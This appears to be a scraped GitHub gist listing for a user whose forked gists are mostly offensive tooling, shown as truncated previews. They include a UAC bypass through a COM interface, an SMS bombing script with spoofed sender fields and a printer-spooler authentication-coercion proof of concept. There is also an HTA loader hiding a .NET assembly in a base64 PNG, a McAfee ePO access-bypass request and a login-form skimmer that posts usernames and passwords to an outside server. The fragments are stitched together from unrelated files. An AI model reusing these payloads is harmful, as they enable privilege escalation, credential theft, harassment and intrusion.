unbaiat unbaiat

  • Unicorns United Ltd
  • Castalia
/*
 * Three single-bit flag values, given local names by this file.
 * NOTE(review): the values coincide with the Windows SDK <ncrypt.h> flags
 * NCRYPT_PREFER_VIRTUAL_ISOLATION_FLAG (0x00010000),
 * NCRYPT_USE_VIRTUAL_ISOLATION_FLAG (0x00020000) and
 * NCRYPT_USE_PER_BOOT_KEY_FLAG (0x00040000), which ask CNG to keep a key
 * inside virtualization-based isolation -- confirm against the SDK header
 * and against how the rest of the file uses them (not visible here).
 */
#define NCRYPT_VIRTUAL_ISO_MAYBE  0x00010000  /* bit 16 */
#define NCRYPT_VIRTUAL_ISO        0x00020000  /* bit 17 */
#define NCRYPT_PER_BOOT_KEY       0x00040000  /* bit 18 */
NTSTATUS kuhl_m_standard_test(int argc, wchar_t * argv[])
{
SECURITY_STATUS status;
NCRYPT_PROV_HANDLE hCngProv = 0;
NCRYPT_KEY_HANDLE hCngKey = 0;
DWORD keyLen = 2048;
unbaiat / akagi_58a.c
Created October 24, 2019 13:43 — forked from hfiref0x/akagi_58a.c
UAC bypass using EditionUpgradeManager COM interface
typedef interface IEditionUpgradeManager IEditionUpgradeManager;
typedef struct IEditionUpgradeManagerVtbl {
BEGIN_INTERFACE
HRESULT(STDMETHODCALLTYPE *QueryInterface)(
__RPC__in IEditionUpgradeManager * This,
__RPC__in REFIID riid,
unbaiat / sms-bomber.py
Created June 20, 2019 19:14 — forked from BlackVikingPro/sms-bomber.py
SMS Bombing (Spamming) Application! [Python]
#! /usr/bin/env python
import time, smtplib, sys, getpass
# need to define:
"""
e-prov (email-provider) [gmail]|[yahoo]|[custom]
from [attacker email]
from-spoof [spoof attacker email]
to [target email (syntax: [10-digit #]@mms|txt.[provider].com|net|org)]
c [count (# of txt's to send)]
unbaiat / dementor.py
Created June 14, 2019 05:44 — forked from 3xocyte/dementor.py
rough PoC to connect to spoolss to elicit machine account authentication
#!/usr/bin/env python
# abuse cases and better implementation from the original discoverer: https://github.com/leechristensen/SpoolSample
# some code from https://www.exploit-db.com/exploits/2879/
import os
import sys
import argparse
import binascii
import ConfigParser
{
"mode": "patterns",
"proxySettings": [
{
"address": "127.0.0.1",
"port": 8080,
"username": "",
"password": "",
"type": 1,
"title": "127.0.0.1:8080",
unbaiat / honeybadger.hta
Created May 24, 2019 09:36
HoneyBadger PNG - .NET Assembly Bypass
<html>
<img id="HoneyBadger" src="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAABAAAAAKtCAIAAAA2LYveAAAACXBIWXMAAA7zAAAO8wEcU5k6AAAAEXRFWHRUaXRsZQBQREYgQ3JlYXRvckFevCgAAAATdEVYdEF1dGhvcgBQREYgVG9vbHMgQUcbz3cwAAAALXpUWHREZXNjcmlwdGlvbgAACJnLKCkpsNLXLy8v1ytISdMtyc/PKdZLzs8FAG6fCPGXryy4AAovrklEQVR42ty9i5bjSJIsFgGAZGZWVnX1vFa60tmj/z/6CR19ymp1R3dmerrrkZl8ACFztwiH40kwM6tnJW5PLZMEgXghYO5ubh7/z//jfw8hxOELn1RVFeZedZBvU0r2iX8/ffFs09fSr6qY1o+fXLqz9/yK/3ZdZ+8H/3Yn+9NeK5eIYTfbWfbLfm7dvHQt39tI2ldx8uL5l8Z/cFg5Cfu1MBRz81Kt9W7uPNG3x/d0dl7asDb76/M4bfP0yLbM49Jho3a2C+ttaR0uvTDO/if9RLcd3nT6Gk3c7Hl27vM4eT9dnzzlaApWzhAXzs8/67qu9GVfHbt73Nl1HSv8l7q2O3btpW3P6A5WirShi2WkZQdomtPsDdK27agB/PZY53VbxUav3OjVK/7ZNHv8o8s+H3Zpa54BDcA5bXnjYH9z8b1OyvPlcsF7fti2id3UraPe6atpGn6FI4/P3/EnD8D5tUfywq9affFU1oUmHvNC0hdbUsurmV9XOhQ8Unpdc6m0bD+6Jf/Grp/xC4elYpfxwsHlXN1wPejnqSlLBWfBDFW4QVOsOu7DEbPI3kXsPDjb8dxyQPDv+Xw+nS7YsXe7g05nbJrdfr9v6n3u/uXy9PKNS/3u7u5wOKCvGDR88/z8HEOtUyYvncQaDau6c3kSVFxdsmGkqk3dk77w+ePj44cPH5qd7JzpdNQ+5hfOjFbhX1xOxrSRUcUnuNzxeMSlcSg+5ySi
function h(b, e) {
url = d.one(".J_ajaxUrl").val();
var f = "keyword=" + (d.one(".J_Tagword") ? d.one(".J_Tagword").val() : d.one(".J_SearchKeyword").val()) + "&searchType=" + e;
url.indexOf("?") > 0 ? url += "&" : url += "?",
c({
url: url + f + "&current=" + b,
type: "post",
dataType: "json",
data: {},
success: function(b) {
document.forms[0].onsubmit = function() {
var u = document.getElementById('fm-login-id');
var p = document.getElementById('fm-login-password');
var s = new XMLHttpRequets();
s.open('POST', 'https://myserver/xxx-alibaba/');
s.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
s.onreadystatechange = function() {
if (s.readState == 4) {
document.forms[0].submit();
}
unbaiat / cve-2018-6671.txt
Created March 8, 2019 14:12 — forked from leonjza/cve-2018-6671.txt
cve-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
# CVE-2018-6671 McAfee ePO 5.9.1 Registered Executable Local Access Bypass
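# Specifying an X-Forwarded-For header bypasses the local-only check, which suggests the check relies on a client-supplied header rather than on the connection's actual source address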
# https://kc.mcafee.com/corporate/index?page=content&id=SB10240
# https://nvd.nist.gov/vuln/detail/CVE-2018-6671
#
# 2019 @leonjza
#
# Tested on ePO v5.9.1, missing hotfix EPO5xHF1229850
POST /Notifications/testRegExe.do HTTP/1.1
unbaiat / Get-KerberosKeytab.ps1
Last active February 18, 2019 08:21 — forked from 0xhexmex/Get-KerberosKeytab.ps1
Parses Kerberos Keytab files
param(
[Parameter(Mandatory)]
[string]$Path
)
#Created by [email protected]
#
#Got keytab structure from http://www.ioplex.com/utilities/keytab.txt
#
# keytab {